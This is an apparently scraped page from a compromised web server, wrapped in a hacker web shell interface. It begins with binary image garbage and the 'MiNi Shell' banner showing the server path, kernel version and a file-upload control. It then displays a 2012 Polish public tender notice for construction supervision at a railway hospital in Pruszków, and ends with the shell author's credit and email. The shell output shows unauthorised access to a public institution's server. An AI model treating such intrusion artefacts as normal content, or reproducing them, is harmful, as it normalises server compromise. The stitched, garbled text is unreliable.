JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120612/128591-N-2012.html

<p class="kh_header"><b>Pruszków: Świadczenie usług nadzoru inwestorskiego nad robotami budowlanymi w ramach realizacji zadania inwestycyjnego składającego się z dwóch zadań pn. :
I zadanie - Wdrożenie rozwiązań wykorzystujących odnawialne źródła energii oraz kogenerację w  Szpitalu Kolejowym w Pruszkowie metodą na zwiększenie efektywności jego funkcjonowania, 
II zadanie - Termomodernizacja Szpitala Kolejowego w Pruszkowie metodą na zwiększenie efektywności jego funkcjonowania.</b><br>
<b>Numer ogłoszenia: 128591 - 2012; data zamieszczenia: 12.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Kolejowy im. dr med. Wł. Roeflera SP ZOZ , ul. Warsztatowa 1, 05-800 Pruszków, woj. mazowieckie, tel. 22 77 09 308, faks 22 77 09 308.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług nadzoru inwestorskiego nad robotami budowlanymi w ramach realizacji zadania inwestycyjnego składającego się z dwóch zadań pn. :
I zadanie - Wdrożenie rozwiązań wykorzystujących odnawialne źródła energii oraz kogenerację w  Szpitalu Kolejowym w Pruszkowie metodą na zwiększenie efektywności jego funkcjonowania, 
II zadanie - Termomodernizacja Szpitala Kolejowego w Pruszkowie metodą na zwiększenie efektywności jego funkcjonowania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie kompleksowego Nadzoru Inwestorskiego, t.j. świadczenie      
      usługi dotyczącej koordynacji, zarządzania, kontroli, nadzoru i rozliczenia robót budowlanych,     
      dla: I zadanie - Wdrożenie rozwiązań wykorzystujących odnawialne źródła energii oraz    
      kogenerację w Szpitalu Kolejowym w Pruszkowie metodą na zwiększenie efektywności jego    
      funkcjonowania, II zadanie - Termomodernizacja Szpitala Kolejowego w Pruszkowie metodą na    
      zwiększenie efektywności jego funkcjonowania.
2.	      Postępowanie o udzielenie zamówienia publicznego, zmierzające do wyłonienia wykonawcy/ów   
      zadania/ń: I zadanie - Wdrożenie rozwiązań wykorzystujących odnawialne źródła energii oraz    
      kogenerację w Szpitalu Kolejowym w Pruszkowie metodą na zwiększenie efektywności jego    
      funkcjonowania, II zadanie - Termomodernizacja Szpitala Kolejowego w Pruszkowie metodą na    
     zwiększenie efektywności jego funkcjonowania zostanie wszczęte w czerwcu 2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających do 50% wartości udzielonego zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
przepisy prawa nakładają obowiązek ich posiadania;
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców w    
              Następujący sposób: Zamawiający zbada obecność i prawidłowość każdego wymaganego    
              dokumentu i   oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza   
              spełnianie warunku nie później niż na dzień składania ofert. Zamawiający dokona    
              formalnej oceny spełniania warunków udziału w postępowaniu w oparciu o analizę    
              oświadczeń lub dokumentów  załączonych do oferty lub uzupełnienia dokumentów czy 
              wyjaśnień, zgodnie z formułą:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek spełni Wykonawca, który wykaże wykonanie jednej (1) usługi polegającej na pełnieniu nadzoru inwestorskiego nad robotami budowlanymi we wszystkich wymienionych branżach: robót ogólnobudowlanych, robót instalacyjnych, w tym nadzór nad :
1)	Montażem  instalacji pomp ciepła o mocy powyżej 120 kW, 
2)	 modernizacją kotłowni gazowej lub gazowej przy zastosowaniu modułu kogeneracyjnego
3)	montażem instalacji kolektorów słonecznych 
- oraz nadzór w branży robót elektrycznych i elektroenergetycznych o łącznej wartości nadzorowanych robót nie mniejszej niż 1 000 000,00 zł. (słownie: jeden milion zł) brutto niezależnie od wartości świadczonej usługi, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców w    
              Następujący sposób: Zamawiający zbada obecność i prawidłowość każdego wymaganego    
              dokumentu i   oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza   
              spełnianie warunku nie później niż na dzień składania ofert. Zamawiający dokona    
              formalnej oceny spełniania warunków udziału w postępowaniu w oparciu o analizę    
              oświadczeń lub dokumentów  załączonych do oferty lub uzupełnienia dokumentów czy 
              wyjaśnień, zgodnie z formułą:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek spełni Wykonawca, który dysponuje lub będzie dysponować osobami, 
           które posiadają uprawnienia  do nadzorowania robót budowlanych w branżach:
1.	Inspektor Nadzoru Robót Ogólnobudowlanych - 1 osoba, która posiada uprawnienia do    
kierowania robotami w specjalności konstrukcyjno-budowlanej (lub odpowiadające im wcześniej wydane uprawnienia lub równoważne uprawnienia budowlane wydane na podstawie przepisów obowiązujących w kraju ich wydania) z co najmniej 3 - letnim doświadczeniem w branży - w nadzorze lub w wykonawstwie na samodzielnych stanowiskach.
2.	Inspektor Nadzoru Robót Instalacyjnych  - 1 osoba, która posiada uprawnienia do kierowania 
robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im wcześniej wydane uprawnienia lub równoważne uprawnienia budowlane wydane na podstawie przepisów obowiązujących w kraju ich wydania), z co najmniej 3 - letnim doświadczeniem w branży - w nadzorze lub w wykonawstwie na samodzielnych stanowiskach, która dodatkowo ma doświadczenie w  montażu pomp ciepła o łącznej mocy co najmniej 120  kW
3.	Inspektor Nadzoru Robót Elektrycznych i Elektroenergetycznych - 1 osoba, która posiada   
uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych; (lub odpowiadające im wcześniej wydane uprawnienia lub równoważne uprawnienia budowlane wydane na podstawie przepisów obowiązujących w kraju ich wydania), z co najmniej 3 - letnim doświadczeniem w branży - w nadzorze lub w wykonawstwie na samodzielnych stanowiskach, 
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców w    
              Następujący sposób: Zamawiający zbada obecność i prawidłowość każdego wymaganego    
              dokumentu i   oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza   
              spełnianie warunku nie później niż na dzień składania ofert. Zamawiający dokona    
              formalnej oceny spełniania warunków udziału w postępowaniu w oparciu o analizę    
              oświadczeń lub dokumentów  załączonych do oferty lub uzupełnienia dokumentów czy 
              wyjaśnień, zgodnie z formułą:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by wykonawca posiadał opłaconą polisę na kwotę 1.000.000 zł (słownie:    
            jeden milion zł), a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest 
            ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z    
            przedmiotem zamówienia.  
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców w    
              Następujący sposób: Zamawiający zbada obecność i prawidłowość każdego wymaganego    
              dokumentu i   oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza   
              spełnianie warunku nie później niż na dzień składania ofert. Zamawiający dokona    
              formalnej oceny spełniania warunków udziału w postępowaniu w oparciu o analizę    
              oświadczeń lub dokumentów  załączonych do oferty lub uzupełnienia dokumentów czy 
              wyjaśnień, zgodnie z formułą:  spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Należy złożyć również wypełniony i podpisany przez Wykonawcę formularz ofertowy    
              stanowiący załącznik nr 1 oraz parafowany wzór umowy stanowiący załącznik nr 5.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>15.3.	Zamawiający informuje, że przewiduje możliwości zmiany umowy.
            Zmiany zawartej umowy mogą nastąpić w formie aneksu w następujących przypadkach: 
15.3.1.	ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje    
            konieczność zmiany sposobu wykonania zamówienia przez wykonawcę;
15.3.2.	wystąpią okoliczności skutkujące potrzebą zmiany terminu realizacji zamówienia takie jak:
15.3.2.1.	brak dostępu do mediów (np. awarie w dostawach energii elektrycznej, wody czy innych    
             mediów niezbędnych do wykonania przedmiotu umowy) proporcjonalnie o czas trwania awarii.
15.3.2.2.	wystąpią przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne zewnętrzne i  
             niemożliwe do zapobieżenia a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej.)    
             np. pogoda uniemożliwiająca wykonywanie umowy, zdarzenia nie leżące po żadnej ze stron 
             umowy. Strony mają prawo do skorygowania uzgodnionych zobowiązań i przesunięcia terminu 
             realizacji maksymalnie o czas trwania siły wyższej lub uzasadnionej przeszkody. Strony 
             zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. 
             przeszkód.
15.3.2.3.	wystąpią inne przyczyny obiektywnie niezależne od Wykonawcy uniemożliwiające    
             wykonanie nadzoru nad robotami w sposób przewidziany w SIWZ (zmiana technologii, zmiana 
             norm, itp.).
15.4.	Strony dopuszczają możliwość zmian redakcyjnych oraz zmian będących następstwem zmian   
            danych ujawnionych w rejestrach publicznych, bez konieczności sporządzania aneksu.
15.3.	Ponadto, Strony dopuszczają zmiany w umowie (za zgodą obu stron) polegające na: 
a)	zmianie wysokości brutto wynagrodzenia należnego Wykonawcy w przypadku zmiany stawek    
            podatkowych - od daty wejścia w życie stosownych przepisów prawa - w takim przypadku 
            Wykonawca zobowiązany będzie do wystawiania faktur z uwzględnieniem powyższej zmiany;
b)	zmianie terminu realizacji usługi nadzoru inwestorskiego w uzasadnionych przypadkach, 
            w szczególności:
1)	w razie zmiany terminów realizacji umowy na roboty budowlane dla zadania inwestycyjnego    
            objętego nadzorem - w przypadkach określonych w umowie zawartej pomiędzy Zamawiającym a 
            Wykonawcą robót budowlanych, jak również zmian wynikających z postępu robót budowlanych 
            będących przedmiotem nadzoru oraz ich rozliczenia i przekazania inwestycji do użytkowania, a    
            także w przypadku konieczności rozwiązania/odstąpienia od umowy z wykonawcą robót i 
           wyłonienia kolejnego wykonawcy;
2)	na skutek wad w dokumentacji projektowej ujawnionych w trakcie realizacji przedmiotu umowy;
3)	konieczności wykonania udokumentowanych robót dodatkowych lub uzupełniających;
4)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny;
5)	wprowadzeniu na rynek technologii, materiałów lub urządzeń nowszej generacji pozwalających na    
            zmniejszenie kosztów eksploatacji, czasu realizacji lub kosztów inwestycji;
            - zmiana terminu realizacji usługi nadzoru inwestorskiego musi być dokonana 
            z uwzględnieniem § 5 umowy i nie może skutkować zwiększeniem wynagrodzenia Wykonawcy   
           określonego w § 2 ust. 1 umowy;
c)	odpowiednim zmniejszeniu wynagrodzenia Wykonawcy w razie rezygnacji 
             przez Zamawiającego z wykonania części robót objętych umową z Wykonawcą robót  
             budowlanych;
d) zmianie osób odpowiedzialnych za realizację przedmiotu umowy (załącznik nr 3 do umowy) pod  
     warunkiem, że nowe osoby będą legitymować się uprawnieniami, doświadczeniem i kwalifikacjami    
     zawodowymi nie gorszymi od wymaganych w specyfikacji istotnych warunków zamówienia, na    
     potwierdzenie czego przedłożą stosowane dokumenty (uprawnienia budowlane). Zmiana osób nie     
     stanowi podstawy do aneksowania umowy, jednakże powinna zostać zawarta na piśmie.
15.4.	Dopuszczalne zmiany umowy, o których mowa w ust. 1 mogą być uzasadnione 
            w szczególności:
a)	zmianą obowiązujących przepisów prawa;
b)	obniżeniem kosztów wykonania robót lub kosztów eksploatacji (użytkowania) obiektu, z    
            zachowaniem jakości i funkcjonalności przyjętych rozwiązań;
c)	podniesieniem wydajności urządzeń;
d)	podniesieniem bezpieczeństwa wykonywania robót;
e)	usprawnieniem w trakcie użytkowania obiektu.   
15.5.	W przypadku wystąpienia okoliczności, o których mowa w ust. 1 pkt b) Wykonawca przedstawi  
            Zamawiającemu, uzgodnioną z Wykonawcą robót budowlano - instalacyjnych, propozycję zmiany  
             terminu zakończenia robót wraz z dokumentami potwierdzającymi konieczność przedłużenia  
             umownego terminu wykonania przedmiotu zamówienia z załączoną opinią nadzoru 
             inwestorskiego. Strony wspólnie pisemne uzgodnią nowy termin zakończenia inwestycji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Kolejowy SP ZOZ  w Pruszkowie, ul. Warsztatowa 1, dział zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 11:30, miejsce: Szpital Kolejowy SP ZOZ  w Pruszkowie, ul. Warsztatowa 1, dział zamówień publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest ze środków 
Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2077-2013 oraz ze środków budżetu województwa mazowieckiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com